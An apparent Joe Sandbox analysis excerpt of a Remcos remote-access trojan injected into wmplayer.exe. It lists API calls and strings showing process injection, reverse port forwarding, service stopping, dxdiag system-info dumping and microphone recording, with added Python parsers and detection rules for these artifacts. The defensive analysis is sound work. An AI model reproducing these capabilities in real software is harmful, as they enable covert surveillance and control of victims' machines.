                                                                                            • Opcode ID: f1f18d6f67d0c56b6b6f0c92bb6df62a0d3843c47b306687a1e696fd23abd355
                                                                                            • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                            • Opcode Fuzzy Hash: f1f18d6f67d0c56b6b6f0c92bb6df62a0d3843c47b306687a1e696fd23abd355
                                                                                            • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                            • API String ID: 1107811701-2245803885
                                                                                            • Opcode ID: 0dd1757b787a246d8b17c16158875fd6ab15b0531ed3acb572a42c54e3d5a35f
                                                                                            • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                            • Opcode Fuzzy Hash: 0dd1757b787a246d8b17c16158875fd6ab15b0531ed3acb572a42c54e3d5a35f
                                                                                            • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Program Files (x86)\Windows Media Player\wmplayer.exe), ref: 00406705
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CurrentProcess
                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                            • API String ID: 2050909247-4145329354
                                                                                            • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                            • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                            • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                            • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                            • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                            • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                            • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
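The six calls in the entry above are the standard stop-a-service sequence: OpenSCManagerW with access 0x11 (SC_MANAGER_CONNECT | SC_MANAGER_QUERY_LOCK_STATUS), OpenServiceW with access 0x000F003F (numerically SC_MANAGER_ALL_ACCESS; read as a service mask it includes SERVICE_STOP), then ControlService with control code 1 (SERVICE_CONTROL_STOP), followed by handle cleanup. The Python below is an added example, not Joe Sandbox or Remcos code: it parses `APIs` lines in the form this report prints them (including the `Part of subcall function` prefix and calls listed without an argument list) and decodes those Win32 constants. The input lines are copied from the entry above; the constant tables are the documented Win32 values, and the sequence check is the author's own heuristic.

```python
import re

# Added example (not Joe Sandbox code): parse the "APIs" lines of a function
# entry in this report and decode the constants behind the service-stop
# sequence. SAMPLE_APIS is copied from the report entry above.
SAMPLE_APIS = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
"""

# One report line: [Part of subcall function XXXXXXXX: ]Api.MODULE[(args),] ref: XXXXXXXX
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\),)?\s+ref:\s+(?P<ref>[0-9A-F]{8})$"
)

# Documented Win32 values (winsvc.h / winnt.h).
SERVICE_CONTROL_CODES = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                         3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE",
                         5: "SERVICE_CONTROL_SHUTDOWN"}
STANDARD_RIGHTS = {0x10000: "DELETE", 0x20000: "READ_CONTROL",
                   0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
SC_MANAGER_RIGHTS = {0x0001: "SC_MANAGER_CONNECT", 0x0002: "SC_MANAGER_CREATE_SERVICE",
                     0x0004: "SC_MANAGER_ENUMERATE_SERVICE", 0x0008: "SC_MANAGER_LOCK",
                     0x0010: "SC_MANAGER_QUERY_LOCK_STATUS",
                     0x0020: "SC_MANAGER_MODIFY_BOOT_CONFIG", **STANDARD_RIGHTS}
SERVICE_RIGHTS = {0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
                  0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
                  0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
                  0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE",
                  0x0100: "SERVICE_USER_DEFINED_CONTROL", **STANDARD_RIGHTS}


def parse_arg(tok):
    """'?' -> unknown (None); 8 hex digits -> int; anything else -> literal/symbol."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_line(line):
    """Return a record for one 'APIs' line, or None if the line is not one."""
    line = line.strip().lstrip("•").strip()
    m = API_LINE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {"api": m.group("api"), "module": m.group("module"),
            "args": [parse_arg(a) for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16), "subcall_of": m.group("sub")}


def decode_mask(mask, table):
    """Expand an access mask into the flag names it contains, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if mask & bit]


def decode(rec):
    """Attach a 'decoded' field for the service APIs whose constants matter here."""
    api, args = rec["api"], rec["args"]
    if api == "ControlService" and len(args) > 1 and isinstance(args[1], int):
        rec["decoded"] = SERVICE_CONTROL_CODES.get(args[1], f"control 0x{args[1]:X}")
    elif api == "OpenSCManagerW" and len(args) > 2 and isinstance(args[2], int):
        rec["decoded"] = decode_mask(args[2], SC_MANAGER_RIGHTS)
    elif api == "OpenServiceW" and len(args) > 2 and isinstance(args[2], int):
        rec["decoded"] = decode_mask(args[2], SERVICE_RIGHTS)
    return rec


def parse_apis(text):
    recs = [parse_api_line(l) for l in text.splitlines() if l.strip()]
    return [decode(r) for r in recs if r]


def is_service_stop_sequence(recs):
    """True when the records open the SCM, open a service with SERVICE_STOP and
    send SERVICE_CONTROL_STOP, in that order (the pattern of the entry above)."""
    wanted = iter(["OpenSCManagerW", "OpenServiceW", "ControlService"])
    need = next(wanted)
    for r in recs:
        if r["api"] != need:
            continue
        if need == "OpenServiceW" and "SERVICE_STOP" not in r.get("decoded", []):
            return False
        if need == "ControlService" and r.get("decoded") != "SERVICE_CONTROL_STOP":
            return False
        need = next(wanted, None)
        if need is None:
            return True
    return False


if __name__ == "__main__":
    recs = parse_apis(SAMPLE_APIS)
    for r in recs:
        print(f"{r['ref']:08X} {r['api']:<20} {r.get('decoded', '')}")
    print("service stop sequence:", is_service_stop_sequence(recs))
```

Arguments shown as `?` are values the IDA plugin could not resolve statically, so any check that depends on them (for example the service name passed to OpenServiceW) has to come from the dynamic trace, not from these lines.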
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00446DDF
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 00446DEB
                                                                                            • _free.LIBCMT ref: 00446DF6
                                                                                            • _free.LIBCMT ref: 00446E01
                                                                                            • _free.LIBCMT ref: 00446E0C
                                                                                            • _free.LIBCMT ref: 00446E17
                                                                                            • _free.LIBCMT ref: 00446E22
                                                                                            • _free.LIBCMT ref: 00446E2D
                                                                                            • _free.LIBCMT ref: 00446E38
                                                                                            • _free.LIBCMT ref: 00446E46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                            • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                            • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 100059EA
                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                            • _free.LIBCMT ref: 100059F6
                                                                                            • _free.LIBCMT ref: 10005A01
                                                                                            • _free.LIBCMT ref: 10005A0C
                                                                                            • _free.LIBCMT ref: 10005A17
                                                                                            • _free.LIBCMT ref: 10005A22
                                                                                            • _free.LIBCMT ref: 10005A2D
                                                                                            • _free.LIBCMT ref: 10005A38
                                                                                            • _free.LIBCMT ref: 10005A43
                                                                                            • _free.LIBCMT ref: 10005A51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                            • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                            • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                            • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Eventinet_ntoa
                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                            • API String ID: 3578746661-4192532303
                                                                                            • Opcode ID: a38dbfa5e2e7c27da92c0b528410f9cafb1ec2c8537a7cf768ff9d45ffcb7ab9
                                                                                            • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                            • Opcode Fuzzy Hash: a38dbfa5e2e7c27da92c0b528410f9cafb1ec2c8537a7cf768ff9d45ffcb7ab9
                                                                                            • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                            APIs
                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DecodePointer
                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                            • API String ID: 3527080286-3064271455
                                                                                            • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                            • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                            • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                            • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                            APIs
                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                            • API String ID: 1462127192-2001430897
                                                                                            • Opcode ID: 6ff8d5af6ff231dab96d0dcea5a4716c226ace1cd344c26e624c75188f411a1b
                                                                                            • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                            • Opcode Fuzzy Hash: 6ff8d5af6ff231dab96d0dcea5a4716c226ace1cd344c26e624c75188f411a1b
                                                                                            • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                            APIs
                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                            • API String ID: 3809562944-3643129801
                                                                                            • Opcode ID: a486acdecd70e56ae6275222454893cf0b15f71a35234b0713371b2576243bbe
                                                                                            • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                            • Opcode Fuzzy Hash: a486acdecd70e56ae6275222454893cf0b15f71a35234b0713371b2576243bbe
                                                                                            • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                            • waveInStart.WINMM ref: 00401A81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                            • String ID: XCG$`=G$x=G
                                                                                            • API String ID: 1356121797-903574159
                                                                                            • Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                            • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                            • Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                            • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
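Two of the entries above leave host artifacts that can be hunted for directly. The dxdiag entry calls ShellExecuteW("open", "dxdiag", ...) with the strings "/t ", "temp" and "\sysinfo.txt", then Sleep(100 ms), CreateFileW and DeleteFileW: the agent has dxdiag write its report to sysinfo.txt under the temp directory, reads it and deletes it. The two waveIn entries create a directory, open the default capture device (waveInOpen with device id 0xFFFFFFFF, WAVE_MAPPER) and keep re-queuing a buffer, writing the captured audio to a file named strftime("%Y-%m-%d %H.%M") + ".wav". The Python below is an added example, not part of the Joe Sandbox report and not Remcos code: it applies those two patterns to constructed Sysmon-style events (EventID 1 process creation, EventID 11 file creation). The paths, the parent process and the output directory in the sample events are invented for the example; the report does not name the recording directory.

```python
import re
from datetime import datetime
from pathlib import PureWindowsPath

# Added example (not Joe Sandbox or Remcos code). Hunts endpoint telemetry for
# two artifacts of the functions listed above:
#   1. dxdiag started with "/t" writing sysinfo.txt under a Temp directory
#      (ShellExecuteW("open", "dxdiag", "/t ...\sysinfo.txt"));
#   2. creation of a .wav file named strftime("%Y-%m-%d %H.%M") + ".wav"
#      (the waveIn* recorder).
# SAMPLE_EVENTS are constructed Sysmon-style records; every path is invented.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\dxdiag.exe",
     "CommandLine": r"dxdiag /t C:\Users\user\AppData\Local\Temp\sysinfo.txt",
     "ParentImage": r"C:\Program Files\Windows Media Player\wmplayer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\dxdiag.exe",      # interactive use
     "CommandLine": "dxdiag", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 11, "Image": r"C:\Program Files\Windows Media Player\wmplayer.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\rec\2024-12-06 14.32.wav"},
    {"EventID": 11, "Image": r"C:\Program Files\Audacity\Audacity.exe",   # benign
     "TargetFilename": r"C:\Users\user\Music\take 1.wav"},
    {"EventID": 11, "Image": r"C:\Windows\System32\notepad.exe",        # month 13
     "TargetFilename": r"C:\Users\user\Desktop\2024-13-06 14.32.wav"},
]

# "/t" followed by a quoted or bare output path.
DXDIAG_T = re.compile(r'(?i)(?:^|\s)/t\s+(?:"([^"]+)"|(\S+))')
# YYYY-MM-DD HH.MM.wav, the shape strftime("%Y-%m-%d %H.%M") + ".wav" produces.
WAV_NAME = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}\.\d{2}\.wav$", re.IGNORECASE)


def is_dxdiag_sysinfo_dump(ev):
    """dxdiag.exe launched with /t and an output file named sysinfo.txt in a Temp dir."""
    if ev.get("EventID") != 1:
        return False
    if PureWindowsPath(ev.get("Image", "")).name.lower() != "dxdiag.exe":
        return False
    m = DXDIAG_T.search(ev.get("CommandLine", ""))
    if not m:
        return False
    out = PureWindowsPath(m.group(1) or m.group(2))
    parts = [p.lower() for p in out.parts]
    return out.name.lower() == "sysinfo.txt" and "temp" in parts


def is_timestamped_wav(ev):
    """File create of <YYYY-MM-DD HH.MM>.wav that is also a valid timestamp."""
    if ev.get("EventID") != 11:
        return False
    name = PureWindowsPath(ev.get("TargetFilename", "")).name
    if not WAV_NAME.match(name):
        return False
    try:
        # Same format string the recorder uses; rejects impossible dates/times.
        datetime.strptime(name[:-4], "%Y-%m-%d %H.%M")
    except ValueError:
        return False
    return True


def hunt(events):
    """Return (rule, actor, artifact) tuples for every matching event."""
    hits = []
    for ev in events:
        if is_dxdiag_sysinfo_dump(ev):
            hits.append(("dxdiag_sysinfo_dump", ev.get("ParentImage", ""),
                         ev.get("CommandLine", "")))
        elif is_timestamped_wav(ev):
            hits.append(("timestamped_wav", ev.get("Image", ""),
                         ev.get("TargetFilename", "")))
    return hits


if __name__ == "__main__":
    for rule, actor, artifact in hunt(SAMPLE_EVENTS):
        print(f"{rule:<22} {actor}  ->  {artifact}")
```

Both rules are deliberately narrow: dxdiag with `/t` is a legitimate support-desk action, so the parent process (here an injected wmplayer.exe, per the snapshot name in this report) and the short-lived sysinfo.txt are what make it suspicious, and the `.wav` rule only catches the naming scheme, not a recorder that has been rebuilt with a different format string.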
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                              • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                              • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                              • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                            • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                            • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                            • String ID: Remcos
                                                                                            • API String ID: 1970332568-165870891
                                                                                            • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                            • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                            • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                            • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
